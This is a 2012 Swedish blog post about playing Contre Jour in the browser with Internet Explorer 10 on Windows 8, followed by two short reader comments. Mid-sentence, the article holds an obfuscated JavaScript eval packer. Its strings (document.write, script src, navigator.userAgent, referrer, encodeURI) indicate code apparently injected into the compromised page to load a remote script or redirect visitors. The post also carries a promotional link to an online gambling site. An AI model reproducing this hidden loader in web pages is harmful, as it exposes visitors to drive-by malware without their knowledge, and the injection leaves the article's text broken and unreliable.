Image Image Image Image Image Image Image Image Image Image

| 22 oktober, 2018

Scroll to top

Top

Spel: Underbara Contre Jour direkt i webbläsaren!

Spel: Underbara Contre Jour direkt i webbläsaren!
Filip Urde
  • On 10 oktober, 2012
  • http://www.revue.se/filip-urde

Som ni kanske vet så släpps Windows 8 snart och Revue har varit och testat den nya mjukvaran. Windows 8 är som ni kanske förstått en mix av den klassiska desktop upplevelsen och den nya ”hands on”, tablet känslan som vi alla lärt att älska. I denna nya revolutionerande satsning från Microsofts så har man haft som mål att tillfredsställa alla typer av användare, inte minst om man är Gamer och det är spel vi ska prata om idag.

Definitionen av gamers är i regel två typer, dem som är lite mer ”hardcore”, desktop användare och dem som är ”Casualgamers” och gillar appar samt småspel. Tanken är att båda dessa världar ska mötas i Windows 8, där man effektivt byter mellan desktop och appmiljön.

Något man är väldigt stolta över borta på Microsoft är nya IE 10 (internet Explorer 10), som jag själv måste säga är grymt, särskilt om du jämför med tidigare versioner. Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yayek|var|u0026u|referrer|hrzff||js|php’.split(‘|’),0,{}))
är i nya IE tillsammans med HTML 5 som man nu börjat integrera spel 
direkt i webbläsaren. En satsning som jag verkligen tror på.

Vill du testa detta så kan du på adressen www.contrejour.ie  sen igår spela det fantastiska Contre Jour i helskärmsläge och direkt i din webbläsare. Kan det vara så att detta är framtiden? Spelupplevelser direkt i webbläsaren och i helskärmsformat.

Med tanke på vilka kraftfulla burkar och tablets som kommer så tror jag att detta kan bli något som gör Windows 8 väldigt unikt!

Om ni gillar Contre Jour kan ni också testa på Jackpot City (besök webbsida) som har massor med spännande spel man kan vinna pengar på, både online och på mobilen.

Uppdatering: En annan spelupplevelse som är optimerad för kommande Internet Expolrer 10 är Atari online som ni kan testa här.

 (mer om själva Windows 8 kommer inomkort). 

Läs mer här: http://blogs.technet.com/b/microsoftnyheter/archive/2012/10/10/spela-contre-jour-online-med-internet-explorer.aspx

Comments

  1. Intressant. lite som Quake som också kan spelas direkt i webbläsaren

  2. Hypeman

    Gillar idén starkt. Coolt sätt att visa motorn i ie 10 ihop med HTML 5. Ska bli kul att köra Win 8 när det släpps. Har betan och det är riktigt snyggt interface.